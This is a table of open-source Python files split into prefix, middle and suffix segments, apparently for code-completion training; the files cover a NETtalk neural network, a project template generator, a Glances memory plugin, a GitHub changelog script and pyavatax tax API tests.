repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
gnrhxni/CS542 | multiple_nn.py | Python | gpl-3.0 | 7,175 | 0.018815 | #!/usr/bin/python
import os
import re
import sys
import numpy
import pybrain
import pickle
import math
import time
import random
from nettalk_data import *
from constants import *
from pybrain.datasets import SupervisedDataSet
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.structure.modules import Line | arLayer, Sigm | oidLayer, BiasUnit
from pybrain.structure.networks import FeedForwardNetwork
from pybrain.structure import FullConnection
from pybrain.datasets import SupervisedDataSet
from sigmoidsparselayer import SigmoidSparseLayer
from pybrain.tools.shortcuts import buildNetwork
from prevent_overtraining import PreventOverTrainer
from nettalk_modules import *
WORDSTRAINED=25000
children = []
master = None
def setup(numNetworks = 1, hidden=80, hidden2=0, forgiving=False):
child_networks = []
for i in range(numNetworks):
neural_network = buildnet(buildModules(NUMINPUTS, hidden, NUMOUTPUTS, hidden2=hidden2))
newWeights = np.random.uniform(-0.3, 0.3, len(neural_network.params))
neural_network._setParameters(newWeights)
child_networks.append(neural_network)
master_network = buildnet(buildModules(NUMOUTPUTS*numNetworks, hidden, NUMOUTPUTS, hidden2=hidden2))
newWeights = np.random.uniform(-0.3, 0.3, len(neural_network.params))
master_network._setParameters(newWeights)
return (child_networks, master_network)
def createDatasetFromWord(word):
output = outputUnits(word)
ds = SupervisedDataSet(NUMINPUTS, NUMOUTPUTS)
char_pos = 0
#loop through each letter in the word, and center it in a 7-character sequence
for letter in wordstream(input_entries = (word,)):
for binary_input in convertToBinary(letter):
binary_output = output[char_pos]
ds.addSample(binary_input, binary_output)
char_pos+= 1
return ds
def createMasterDataset(words, networks):
ds = SupervisedDataSet(NUMOUTPUTS*len(networks), NUMOUTPUTS)
for word in words:
output = outputUnits(word)
char_pos = 0
#loop through each letter in the word, and center it in a 7-character sequence
for letter in wordstream(input_entries = (word,)):
for binary_input in convertToBinary(letter):
final_input = []
binary_output = output[char_pos]
for (network, trainer) in networks:
final_input = final_input + network.activate(binary_input).tolist()
ds.addSample(final_input, binary_output)
char_pos+= 1
return ds
def testOneWord(children, word, output=None):
""" Return (phoneme_error, stress_error) lists
The lists are parallel and indexed by letter position
in the input word, which must be a DictionaryEntry.
if output is missing, it is calculated, but it can also
be passed in to save time if we already have it"""
phoneme_error = list()
stress_error = list()
if (None == output): output = outputUnits(word)
char_pos = 0
for letter in wordstream(input_entries = (word,)):
#now convert these 7-character sequences into binary
for binary_input in convertToBinary(letter):
final_input = None;
#determine the corresponding correct output and add the sample to the dataset
binary_output = output[char_pos]
for (network, trainer) in children:
if final_input == None:
final_input = network.activate(binary_input)
else:
final_input = np.array(final_input) + np.array(network.activate(binary_input))
network_output = final_input/len(children)
phoneme = word.phonemes[char_pos]
stress = word.stress[char_pos]
calculated_phoneme = closestByDotProduct(network_output[:MINSTRESS], articFeatures)
calculated_stress = closestByDotProduct(network_output[MINSTRESS:], stressFeatures)
phoneme_error.append(bool(phoneme != calculated_phoneme))
stress_error.append(bool(stress != calculated_stress))
char_pos = char_pos + 1
return (phoneme_error, stress_error)
def testWords(children, inputfile):
phoneme_error = list()
stress_error = list()
#loop through each word in our data, treating each one as a seperate dataset
for word in dictionary(inputfile):
(pherrors, serrors) = testOneWord(children, word);
phoneme_error.extend(pherrors);
stress_error.extend(serrors);
print("Generalization: phoneme %.3f stress %.3f" % ( 1-np.mean(phoneme_error), 1-np.mean(stress_error)) )
return ( 1-np.mean(phoneme_error), 1-np.mean(stress_error))
def trainNetwork(children, master, trainfile, testfile, outfile, testSkip=1000):
ret = ([], [], [])
numChildren = len(children)
cycle = 0
#loop through each word in our data, treating each one as a seperate dataset
curWords = []
for word in dictionary(trainfile):
(neural_network, trainer) = children[cycle]
trainer.setData(createDatasetFromWord(word))
err = trainer.train()
cycle += 1
curWords.append(word)
if cycle == numChildren:
cycle = 0
if (numChildren > trainNetwork.counter % testSkip):
testerror = testWords(children, testfile);
ret[0].append(trainNetwork.counter);
ret[1].append(testerror[0]);
ret[2].append(testerror[1]);
outfile.write("%d %.3f %.3f\n" % (trainNetwork.counter, testerror[0], testerror[1]))
outfile.flush();
trainNetwork.counter += numChildren
return ret;
trainNetwork.counter=0
def main():
experiment = [];
hidden=80
hidden2=0
lrate=0.4
beta=0
r=0.5
numNetworks = int(sys.argv[1])
testSkip=1000
f = open('nettalk.data','r');
f1 = open('temptrain','w');
f2 = open('temptest','w');
l1 = set()
l2 = set()
# Put all the lines in f in random order into f1 and f2
# in the proportion described by "proportion"
for l in f.readlines():
if (random.random() < 0.5): l1.add(l)
else: l2.add(l);
for l in l1: f1.write(l);
for l in l2: f2.write(l);
f.close(); f1.close(); f2.close();
for (train, test) in (('temptrain','temptest'),):
(child_networks, master_network) = setup(numNetworks, hidden, hidden2)
for child_network in child_networks:
child_trainer = BackpropTrainer(child_network, None, learningrate=lrate, verbose=True, batchlearning=True, weightdecay=0.0)
children.append((child_network, child_trainer))
master_trainer = BackpropTrainer(master_network, None, learningrate=lrate, verbose=True, batchlearning=True, weightdecay=0.0)
master = (master_network, master_trainer)
fname = 'numChildren_%.1f.%d' % (numNetworks, int(time.time()))
outfile = open(fname,'w')
trainNetwork.counter=0
while trainNetwork.counter < WORDSTRAINED:
trainerror = trainNetwork(children, master, train, test, outfile, testSkip=testSkip)
experiment.append(trainerror)
if __name__ == '__main__':
main()
|
MacHu-GWU/elementary_math-project | start-a-project/init_project.py | Python | mit | 3,304 | 0.001211 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This script can generate automate scripts for open source python project.
Scroll to ``if __name__ == "__main__":`` for more info.
"""
from __future__ import print_function
import sys
import datetime
from os import walk, mkdir
from os.path import join, abspath, dirname, basename
def write(s, path, encoding="utf-8"):
"""Write string to text file.
"""
with open(path, "wb") as f:
f.write(s.encode(encoding))
def read(path, encoding="utf-8"):
"""Read string from text file.
"""
with open(path, "rb") as f:
return f.read().decode(encoding)
def initiate_project(
package_name,
repo_name,
python_version,
github_username,
author_name,
author_email,
maintainer_name,
maintainer_email,
year,
s3_bucket,
):
"""
Generate project start files.
"""
print("Initate '%s-project' from template ..." % package_name)
template_dir = join(dirname(abspath(__file__)), "template")
output_dir = join(dirname(abspath(__file__)), "%s-project" % package_name)
for src_dir, dir_list, file_list in walk(template_dir):
# destination directory
dst_dir = src_dir.replace(template_dir, output_dir, 1)
if basename(dst_dir) == "__package__":
dst_dir = join(dirname(dst_dir), p | ackage_name)
# make destination direc | tory
try:
print(" Create '%s' ..." % dst_dir)
mkdir(dst_dir)
except:
pass
# files
for filename in file_list:
src = join(src_dir, filename)
dst = join(dst_dir, filename)
content = read(src).\
replace("{{ package_name }}", package_name).\
replace("{{ repo_name }}", repo_name).\
replace("{{ python_version }}", python_version).\
replace("{{ github_username }}", github_username).\
replace("{{ author_name }}", author_name).\
replace("{{ author_email }}", author_email).\
replace("{{ maintainer_name }}", maintainer_name).\
replace("{{ maintainer_email }}", maintainer_email).\
replace("{{ year }}", year).\
replace("{{ s3_bucket }}", s3_bucket)
print(" Create '%s' ..." % dst)
write(content, dst)
print(" Complete!")
if __name__ == "__main__":
# --- EDIT THESE VARIABLE based on your own situation ---
package_name = "picage" # IMPORTANT
repo_name = "{package_name}-project".format(package_name=package_name)
python_version = "python%s%s" % (
sys.version_info.major, sys.version_info.minor)
github_username = "MacHu-GWU" # IMPORTANT
author_name = "Sanhe Hu" # IMPORTANT
author_email = "husanhe@gmail.com" # IMPORTANT
maintainer_name = author_name
maintainer_email = author_email
year = str(datetime.datetime.utcnow().year)
s3_bucket = "www.wbh-doc.com" # IMPORTANT
initiate_project(
package_name,
repo_name,
python_version,
github_username,
author_name,
author_email,
maintainer_name,
maintainer_email,
year,
s3_bucket,
) |
shackra/thomas-aquinas | tests/test_accelerate.py | Python | bsd-3-clause | 833 | 0.02401 | # coding: utf-8
testinfo = "s, t 4, s, t 8, s, t 10.1, s, q"
tags = "Accelerate"
from summa.layer import Layer
from summa.director import director
from summa.actions import Accelerate, Rotate
from summa.sprite import Sprite
import customstuff
import pyglet
import os
pyglet.resource.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__))))
pyglet.resource.reindex( | )
class TestLayer(Layer):
def __init__(self):
super( TestLayer, self ).__init__()
x, y = director.get_window_size()
self.sprite = Sprite( 'grossini.png', (x/2, y/2) )
self.add( self.sprite )
self.sprite.do( Accelerate( Rotate( 360, 10 ), 4 ) )
def test_accelerate():
director. | init()
test_layer = TestLayer()
main_scene = customstuff.TimedScene(test_layer)
director.run(main_scene)
|
Rocky5/XBMC-Emustation | Mod Files/emustation/scripts/not used/Other/Remove _Resources.py | Python | gpl-3.0 | 1,405 | 0.036299 | import os, shutil, xbmc, xbmcgui
pDialog = xbmcgui.DialogProgress()
dialog = xbmcgui.Dialog()
Game_Directories = [ "E:\\Games\\", "F:\\Games\\", "G:\\Games\\", "E:\\Applications\\", "F:\\Applications\\", "G:\\Applications\\", "E:\\Homebrew\\", "F:\\Homebrew\\", "G:\\Homebrew\\", "E:\\Apps\\", "F:\\Apps\\", "G:\\Apps\\", "E:\\Ports\\", "F:\\Ports\\", "G:\\Ports\\" ]
for Game_Directories in Game_Directories:
if os.path.isdir( Game_Directories ):
pDialog.create( "PARSING XBOX GAMES","Initializing" )
pDialog.update(0,"Removing _Resources Folders","","This can take some time, please be patient.")
for Items in sorted( os.listdir( Game_Directories ) ):
if os.path.isdir(os.path.join( Game_Directories, Items)):
Game_Directory = os.path.join | ( Game_Directories, Items )
_Resources = os.path.join( Game_Directory, "_Resources" )
DefaultTBN = os.path.join( Ga | me_Directory, "default.tbn" )
FanartJPG = os.path.join( Game_Directory, "fanart.jpg" )
if os.path.isdir(_Resources):
shutil.rmtree(_Resources)
else:
print "Cannot find: " + _Resources
if os.path.isfile(DefaultTBN):
os.remove(DefaultTBN)
else:
print "Cannot find: " + DefaultTBN
if os.path.isfile(FanartJPG):
os.remove(FanartJPG)
else:
print "Cannot find: " + FanartJPG
pDialog.close()
dialog.ok("COMPLETE","Done, _Resources Folders Removed.") |
stdweird/aquilon | lib/python2.6/aquilon/worker/formats/network_environment.py | Python | apache-2.0 | 1,413 | 0.001415 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2009,2010,2011,2012,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License. |
"""Network environment formatter."""
from aquilon.aqdb.model import NetworkEnvironment
from aquilon.worker.formats.formatters import ObjectFormatter
class NetworkEnvironmentFormatter(ObjectFormatter):
def format_raw(self, netenv, indent=""):
details = [indent + "{0:c}: {0.name}".format(nete | nv)]
details.append(self.redirect_raw(netenv.dns_environment, indent + " "))
if netenv.location:
details.append(self.redirect_raw(netenv.location, indent + " "))
if netenv.comments:
details.append(indent + " Comments: %s" % netenv.comments)
return "\n".join(details)
ObjectFormatter.handlers[NetworkEnvironment] = NetworkEnvironmentFormatter()
|
desbma/glances | glances/plugins/glances_mem.py | Python | lgpl-3.0 | 11,139 | 0.002335 | # -*- coding: utf-8 -*-
#
# This file is part of Glances.
#
# Copyright (C) 2015 Nicolargo <nicolas@nicolargo.com>
#
# Glances is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Glances is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Virtual memory plugin."""
from glances.plugins.glances_plugin import GlancesPlugin
import psutil
# SNMP OID
# Total RAM in machine: .1.3.6.1.4.1.2021.4.5.0
# Total RAM used: .1.3.6.1.4.1.2021.4.6.0
# Total RAM Free: .1.3.6.1.4.1.2021.4.11.0
# Total RAM Shared: .1.3.6.1.4.1.2021.4.13.0
# Total RAM Buffered: .1.3.6.1.4.1.2021.4.14.0
# Total Cached Memory: .1.3.6.1.4.1.2021.4.15.0
# Note: For Windows, stats are in the FS table
snmp_oid = {'default': {'total': '1.3.6.1.4.1.2021.4.5.0',
'free': '1.3.6.1.4.1.2021.4.11.0',
| 'shared': '1.3.6.1.4.1.2021.4.13.0',
'buffers': '1.3.6.1.4.1.2021.4.14.0',
'cached': '1.3.6.1.4.1.2021.4.15.0'},
'windows': {'mnt_point': '1.3.6.1.2.1.25.2.3.1.3',
'alloc_unit': '1.3.6.1.2.1.25.2.3.1.4',
'size': '1.3.6.1.2.1.25.2.3.1.5',
'used': '1.3.6.1.2.1.25.2.3.1.6'},
| 'esxi': {'mnt_point': '1.3.6.1.2.1.25.2.3.1.3',
'alloc_unit': '1.3.6.1.2.1.25.2.3.1.4',
'size': '1.3.6.1.2.1.25.2.3.1.5',
'used': '1.3.6.1.2.1.25.2.3.1.6'}}
# Define the history items list
# All items in this list will be historised if the --enable-history tag is set
# 'color' define the graph color in #RGB format
items_history_list = [{'name': 'percent', 'color': '#00FF00', 'y_unit': '%'}]
class Plugin(GlancesPlugin):
"""Glances' memory plugin.
stats is a dict
"""
def __init__(self, args=None):
"""Init the plugin."""
GlancesPlugin.__init__(self, args=args, items_history_list=items_history_list)
# We want to display the stat in the curse interface
self.display_curse = True
# Init the stats
self.reset()
def reset(self):
"""Reset/init the stats."""
self.stats = {}
@GlancesPlugin._log_result_decorator
def update(self):
"""Update RAM memory stats using the input method."""
# Reset stats
self.reset()
if self.input_method == 'local':
# Update stats using the standard system lib
# Grab MEM using the PSUtil virtual_memory method
vm_stats = psutil.virtual_memory()
# Get all the memory stats (copy/paste of the PsUtil documentation)
# total: total physical memory available.
# available: the actual amount of available memory that can be given instantly to processes that request more memory in bytes; this is calculated by summing different memory values depending on the platform (e.g. free + buffers + cached on Linux) and it is supposed to be used to monitor actual memory usage in a cross platform fashion.
# percent: the percentage usage calculated as (total - available) / total * 100.
# used: memory used, calculated differently depending on the platform and designed for informational purposes only.
# free: memory not being used at all (zeroed) that is readily available; note that this doesn’t reflect the actual memory available (use ‘available’ instead).
# Platform-specific fields:
# active: (UNIX): memory currently in use or very recently used, and so it is in RAM.
# inactive: (UNIX): memory that is marked as not used.
# buffers: (Linux, BSD): cache for things like file system metadata.
# cached: (Linux, BSD): cache for various things.
# wired: (BSD, OSX): memory that is marked to always stay in RAM. It is never moved to disk.
# shared: (BSD): memory that may be simultaneously accessed by multiple processes.
self.reset()
for mem in ['total', 'available', 'percent', 'used', 'free',
'active', 'inactive', 'buffers', 'cached',
'wired', 'shared']:
if hasattr(vm_stats, mem):
self.stats[mem] = getattr(vm_stats, mem)
# Use the 'free'/htop calculation
# free=available+buffer+cached
self.stats['free'] = self.stats['available']
if hasattr(self.stats, 'buffers'):
self.stats['free'] += self.stats['buffers']
if hasattr(self.stats, 'cached'):
self.stats['free'] += self.stats['cached']
# used=total-free
self.stats['used'] = self.stats['total'] - self.stats['free']
elif self.input_method == 'snmp':
# Update stats using SNMP
if self.short_system_name in ('windows', 'esxi'):
# Mem stats for Windows|Vmware Esxi are stored in the FS table
try:
fs_stat = self.get_stats_snmp(snmp_oid=snmp_oid[self.short_system_name],
bulk=True)
except KeyError:
self.reset()
else:
for fs in fs_stat:
# The Physical Memory (Windows) or Real Memory (VMware)
# gives statistics on RAM usage and availability.
if fs in ('Physical Memory', 'Real Memory'):
self.stats['total'] = int(fs_stat[fs]['size']) * int(fs_stat[fs]['alloc_unit'])
self.stats['used'] = int(fs_stat[fs]['used']) * int(fs_stat[fs]['alloc_unit'])
self.stats['percent'] = float(self.stats['used'] * 100 / self.stats['total'])
self.stats['free'] = self.stats['total'] - self.stats['used']
break
else:
# Default behavor for others OS
self.stats = self.get_stats_snmp(snmp_oid=snmp_oid['default'])
if self.stats['total'] == '':
self.reset()
return self.stats
for key in list(self.stats.keys()):
if self.stats[key] != '':
self.stats[key] = float(self.stats[key]) * 1024
# Use the 'free'/htop calculation
self.stats['free'] = self.stats['free'] - self.stats['total'] + (self.stats['buffers'] + self.stats['cached'])
# used=total-free
self.stats['used'] = self.stats['total'] - self.stats['free']
# percent: the percentage usage calculated as (total - available) / total * 100.
self.stats['percent'] = float((self.stats['total'] - self.stats['free']) / self.stats['total'] * 100)
# Update the history list
self.update_stats_history()
# Update the view
self.update_views()
return self.stats
def update_views(self):
"""Update stats views."""
# Call the father's method
GlancesPlugin.update_views(self)
# Add specifics informations
# Alert and log
self.views['used']['decoration'] = self.get_alert_log(self.stats['used'], maximum=self.stats['total'])
# Optional
for key in ['active', 'inactive', 'buffers', 'cached']:
if key in self.stats:
self.views[key]['optional'] = True
def msg_curse(self, args=None):
"""Return the dict to display in the curse interface."""
# Init the return message
ret = []
|
alirizakeles/tendenci | tendenci/apps/directories/choices.py | Python | gpl-3.0 | 692 | 0.013006 | from django.utils.translation import ugettext_lazy as _
DURATION_CHOICES = (
(14, _('14 Days from Activation date')),
(60, _('60 Days from Activation date')),
(90,_('90 Days from Activation date')),
(120,_('120 Days from Activation date')),
(365,_('1 Year from Activation date')),
)
ADMIN_DURATION_CHOICES = (
(0, _('U | nlimited')),
(14,_('14 Days from Activation date')),
(30,_('30 Days from Activation date')),
(60,_('60 Days from Activation date')),
(90,_('90 Days from Activation date')),
(120,_('120 Days from Activation date')),
| (365,_('1 Year from Activation date')),
)
STATUS_CHOICES = (
(1, _('Active')),
(0, _('Inactive')),
)
|
intellij-rust/intellij-rust.github.io | changelog.py | Python | mit | 9,091 | 0.00176 | #!/usr/bin/env python3
import argparse
import datetime
import os
import re
import urllib.request
from dataclasses import dataclass
from typing import Set, List, Optional, Dict, TextIO
# https://github.com/PyGithub/PyGithub
from github import Github
from github.Milestone import Milestone
from github.Repository import Repository
PLUGIN_REPO = "intellij-rust/intellij-rust"
MAINTAINERS = [
"matklad",
"Undin",
"vlad20012",
"mchernyavsky",
"ortem",
"amakeev",
"MarinaKalashina",
"dima74",
"avrong",
"lancelote",
"ozkriff",
"mili-l",
"neonat",
"intellij-rust-bot",
"dependabot[bot]"
]
@dataclass
class ChangelogItem:
pull_request_id: int
description: str
username: str
def display(self):
if self.username in MAINTAINERS:
return "* [#{}] {}"\
.format(self.pull_request_id, self.description)
else:
return "* [#{}] {} (by [@{}])"\
.format(self.pull_request_id, self.description, self.username)
class ChangelogSection(object):
header: str
items: List[ChangelogItem]
def __init__(self, header: str):
self.header = header
self.items = []
def add_item(self, item: ChangelogItem):
self.items.append(item)
def display(self):
return """## {}\n\n""".format(self.header) + "\n\n".join(map(lambda l: l.display(), self.items))
class Changelog(object):
labels: List[str]
sections: Dict[str, ChangelogSection]
contributors: Set[str]
milestone_id: Optional[int]
def __init__(self, milestone_id=None):
self.milestone_id = milestone_id
self.labels = []
self.sections = {}
self.contributors = set()
self.__add_section("feature", ChangelogSection("New Features"))
self.__add_section("performance", ChangelogSection("Performance Improvements"))
self.__add_section("fix", ChangelogSection("Fixes"))
self.__add_section("internal", ChangelogSection("Internal Improvements"))
def __add_section(self, label: str, section: ChangelogSection):
self.labels.append(label)
self.sections[label] = section
def add_item(self, label: str, item: ChangelogItem):
section = self.sections.get(label)
if section is not None:
section.add_item(item)
if item.username not in MAINTAINERS:
self.contributors.add(item.username)
def write(self, f: TextIO):
for label in self.labels:
section = self.sections[label]
if section.items:
f.write(section.display())
f.write("\n\n")
if self.milestone_id is not None:
f.write("Full set of changes can be found [here]"
f"(https://github.com/{PLUGIN_REPO}/milestone/{self.milestone_id}?closed=1)\n")
if len(self.contributors) > 0:
f.write("\n")
sorted_contributors = sorted(self.contributors)
for name in sorted_contributors:
url = contributor_url(name)
f.write(url)
if len(self.labels) > 0:
pull_request_ids = set()
for label in self.labels:
section = self.sections[label]
for item in section.items:
pull_request_ids.add(item.pull_request_id)
f.write("\n")
for pull_request_id in sorted(pull_request_ids):
f.write(f"[#{pull_request_id}]: https://github.com/{PLUGIN_REPO}/pull/{pull_request_id}\n")
def collect_changelog(repo: Repository, milestone: Milestone):
print(f"Collecting changelog issues for `{milestone.title}` milestone")
changelog = Changelog(milestone.number)
issues = repo.get_issues(milestone=milestone, state="all")
comment_pattern = re.compile("<!--.*-->", re.RegexFlag.DOTALL)
changelog_description_pattern = re.compile("[Cc]hangelog:\\s*(?P<description>([^\n]+\n?)*)")
for issue in issues:
if issue.pull_request is None:
continue
labels: Set[str] = set(map(lambda l: l.name, issue.labels))
if len(labels) == 0:
continue
if issue.body is not None:
issue_text = re.sub(comment_pattern, "", issue.body).replace("\r\n", "\n")
else:
issue_text = ""
result = re.search(changelog_description_pattern, issue_text)
if result is not None:
description = result.group("description").strip().rstrip(".")
else:
description = issue.title
changelog_item = ChangelogItem(issue.number, description, issue.us | er.login)
for label in labels:
changelog.add_item(label, changelog_item)
return changelog
def main():
pars | er = argparse.ArgumentParser()
parser.add_argument("-c", action='store_true', help="add contributor links")
parser.add_argument("--offline", action='store_true', help="do not preform net requests")
parser.add_argument("--token", type=str, help="github token")
parser.add_argument("--login", type=str, help="github login")
parser.add_argument("--password", type=str, help="github password")
parser.add_argument("--list", type=int, nargs=2, metavar=('first', 'last'),
help="collect external contributors for all releases between first and last")
args = parser.parse_args()
if args.c:
contributors()
elif args.list:
contributor_list(args)
else:
new_post(args)
def construct_repo(args: argparse.Namespace) -> Repository:
if args.token is not None:
login_or_token = args.token
password = None
else:
login_or_token = args.login
password = args.password
g = Github(login_or_token, password)
return g.get_repo(PLUGIN_REPO)
def new_post(args: argparse.Namespace):
next_post = len(os.listdir("_posts"))
date = datetime.datetime.now()
changelog = Changelog()
if not args.offline:
expected_milestone_title = f"v{next_post}"
repo: Repository = construct_repo(args)
milestone: Optional[Milestone] = None
for m in repo.get_milestones():
if m.title == expected_milestone_title:
milestone = m
break
if milestone is None:
raise RuntimeError(f"Milestone `{expected_milestone_title}` is not found")
due_on = milestone.due_on
if due_on is not None:
date = due_on.replace(hour=13, minute=0, second=0) # 13:00 is our desired release time
changelog = collect_changelog(repo, milestone)
name = "_posts/{}-changelog-{}.markdown".format(date.date().isoformat(), next_post)
with open(name, 'w') as f:
f.write("""---
layout: post
title: "IntelliJ Rust Changelog #{}"
date: {}
---
""".format(next_post, date.strftime("%Y-%m-%d %H:%M:%S +0300")))
changelog.write(f)
def contributors():
last_post = "_posts/" + sorted(os.listdir("_posts"))[-1]
with open(last_post) as f:
text = f.read()
names = sorted({n[2:-1] for n in re.findall(r"\[@[^]]+]", text)})
with open(last_post) as f:
old_text = f.read()
with open(last_post, 'a') as f:
f.write("\n")
for name in names:
line = contributor_url(name)
if line not in old_text:
f.write(line)
def contributor_url(username: str):
url = "https://github.com/" + username
print("checking " + url)
req = urllib.request.Request(url, method="HEAD")
with urllib.request.urlopen(req) as _:
pass # will thrown on 404
line = "[@{}]: {}\n".format(username, url)
return line
def contributor_list(args: argparse.Namespace) -> None:
if args.list is None:
raise ValueError("list flag should be set")
first = args.list[0]
last = args.list[1]
if first >= last:
raise ValueError("`first` should be less than `last`")
repo = construct_repo(args)
milestones = repo.get_milestones(state="all", sort="due_on")
versions = {f"v{i}" for i in range(first, last + 1)}
contributors = set()
|
lionheart/pyavatax | test_avalara.py | Python | bsd-3-clause | 23,475 | 0.00443 | from pyavatax.base import Document, Line, Address, TaxOverride, AvalaraException, AvalaraTypeException, AvalaraValidationException, AvalaraServerNotReachableException
from pyavatax.api import API
import settings_local # put the below settings into this file, it is in .gitignore
import datetime
import pytest
import uuid
from testfixtures import LogCapture
def get_api(timeout=None):
return API(settings_local.AVALARA_ACCOUNT_NUMBER, settings_local.AVALARA_LICENSE_KEY, settings_local.AVALARA_COMPANY_CODE, live=False, timeout=timeout)
@pytest.mark.example
def test_avalara_and_http():
api = get_api()
data = {
"CustomerCode": "CUST1",
"CompanyCode": settings_local.AVALARA_COMPANY_CODE,
"Addresses":
[
{
"AddressCode": "1",
"Line1": "435 Ericksen Avenue Northeast",
"Line2": "#250",
"PostalCode": "98110"
}
],
"Lines":
[
{
"LineNo": "1",
"DestinationCode": "1",
"OriginCode": "1",
"Qty": 1,
"Amount": 10
},
{
"LineNo": "2",
"DestinationCode": "1",
"OriginCode": "1",
"Qty": 1,
"Amount": 10
}
]
}
stem = '/'.join([api.VERSION, 'tax', 'get'])
resp = api._post(stem, data)
assert resp.status_code == 200
@pytest.mark.example
@pytest.mark.from_data
def test_from_data_example():
api = get_api()
data = {
"CompanyCode": settings_local.AVALARA_COMPANY_CODE,
"CustomerCode": "AvaTim",
"DocCode": uuid.uuid4().hex,
"DocType": "SalesOrder",
"PosLaneCode": "pyavatax unit test",
"Client": "pyavatax",
"Addresses":
[
{
"AddressCode": "1",
"Line1": "435 Ericksen Avenue Northeast",
"Line2": "#250",
"City": "Bainbridge Island",
"Region": "WA",
"PostalCode": "98110",
"Country": "US",
},
{
"AddressCode": "2",
"Line1": "7562 Kearney St.",
"City": "Commerce City",
"Region": "CO",
"PostalCode": "80022-1336",
"Country": "US",
},
],
"Lines":
[
{
"LineNo": "1",
"DestinationCode": "2",
"OriginCode": "1",
"ItemCode": "AvaDocs",
"Description": "Box of Avalara Documentation",
"Qty": 1,
"Amount": "100",
},
],
}
tax = api.post_tax(data, commit=True)
assert tax.is_success is True
@pytest.mark.discount
@pytest.mark.discount_from_data
def test_discount_from_data_example():
api = get_api()
amount = 958.50
data = {'Addresses':
[
{'City': u'acton', 'Country': 'US', 'Region': u'MA', 'Line2': u'', 'Line1': u'68 river st', 'PostalCode': u'01720', 'AddressCode': 2},
{'City': 'Concord', 'Country': 'US', 'Region': 'MA', 'Line2': '', 'Line1': '130B Baker Avenue Extension', 'PostalCode': '01742', 'AddressCode': 1}
],
'DocCode': uuid.uuid4().hex,
'Lines': [
{'ItemCode': 'canon-eos-1dc', 'Discounted': True, 'LineNo': 1, 'DestinationCode': 2, 'Description': u'Canon EOS 1DC', 'Qty': 1L, 'Amount': 667.0, 'OriginCode': 1},
{'ItemCode': 'canon-24-70-f28l-ii', 'Discounted': True, 'LineNo': 2, 'DestinationCode': 2, 'Description': u'Canon 24-70 f/2.8L II', 'Qty': 1L, 'Amount': 111.0, 'OriginCode': 1},
{'ItemCode': 'sandisk-extreme-pro-cf-128gb', 'Discounted': True, 'LineNo': 3, 'DestinationCode': 2, 'Description': u'SanDisk Extreme Pro CF 128GB', 'Qty': 1L, 'Amount': 83.0, 'OriginCode': 1},
{'ItemCode': 'westcott-icelight', 'Discounted': True, 'LineNo': 4, 'DestinationCode': 2, 'Description': u'Westcott IceLight', 'Qty': 1L, 'Amount': 44.0, 'OriginCode': 1},
{'ItemCode': 'sennheiser-mke-400-camera-mic', 'Discounted': True, 'LineNo': 5, 'DestinationCode': 2, 'Description': u'Sennheiser MKE 400 On-Camera Mic', 'Qty': 1L, 'Amount': 53.5, 'OriginCode': 1},
],
'DocType': 'SalesOrder',
'Discount': str(amount),
'CustomerCode': 'details@activefrequency.com'
}
tax = api.post_tax(data, commit=True)
print tax.error
assert tax.is_success is True
assert float(tax.TotalTax) == 0
assert float(tax.TotalAmount) == amount
assert float(tax.TotalDiscount) == amount
@pytest.mark.get_tax
def test_gettax():
api = get_api()
# A Lat/Long from Avalara's documentation
lat = 47.627935
lng = -122.51702
line = Line(Amount=10.00)
doc = Document()
doc.add_line(line)
tax = api.get_tax(lat, lng, doc)
assert tax.is_success is True
assert tax.Tax > 0
assert tax.total_tax == tax.Tax
tax = api.get_tax(lat, lng, None, sale_amount=10.00)
assert tax.is_success is True
assert tax.Tax > 0
assert tax.total_tax == tax.Tax
# when dealing with line items going to different addresses, i.e. a drop-ship situation
# don't use the basic add_from/add_to_address helpers just manually match your own
# Origin and Destination codes for the addresses and line items
@pytest.mark.internals
def test_validation():
    """Exercise client-side validation: bad field values, incomplete documents,
    duplicate addresses, and bad arguments to get_tax."""
    # Field-level validation on construction.
    with pytest.raises(AvalaraValidationException) as e:
        doc = Document(DocDate='foo') # testing date
    assert e.value.code == AvalaraException.CODE_BAD_DATE
    with pytest.raises(AvalaraValidationException) as e:
        line = Line(Qty='foo') # testing int
    assert e.value.code == AvalaraException.CODE_BAD_FLOAT
    with pytest.raises(AvalaraValidationException) as e:
        line = Line(Amount='foo') # testing float
    assert e.value.code == AvalaraException.CODE_BAD_FLOAT
    with pytest.raises(AvalaraValidationException) as e:
        line = Line(ItemCode='this string is longer than fifty characters and should be stopped') # testing length
    assert e.value.code == AvalaraException.CODE_TOO_LONG
    # Document-level validation: needs addresses first, then lines.
    doc = Document.new_sales_order(DocCode='1001', DocDate=datetime.date.today(), CustomerCode='email@email.com')
    with pytest.raises(AvalaraValidationException) as e:
        doc.validate()
    assert e.value.code == AvalaraException.CODE_BAD_ADDRESS
    from_address = Address(Line1="435 Ericksen Avenue Northeast", Line2="#250", PostalCode="98110")
    to_address = Address(Line1="435 Ericksen Avenue Northeast", Line2="#250", PostalCode="98110")
    doc.add_from_address(from_address)
    doc.add_to_address(to_address)
    with pytest.raises(AvalaraValidationException) as e:
        doc.validate()
    assert e.value.code == AvalaraException.CODE_BAD_LINE
    # A document only accepts one from/to address via the basic helpers.
    with pytest.raises(AvalaraException) as e:
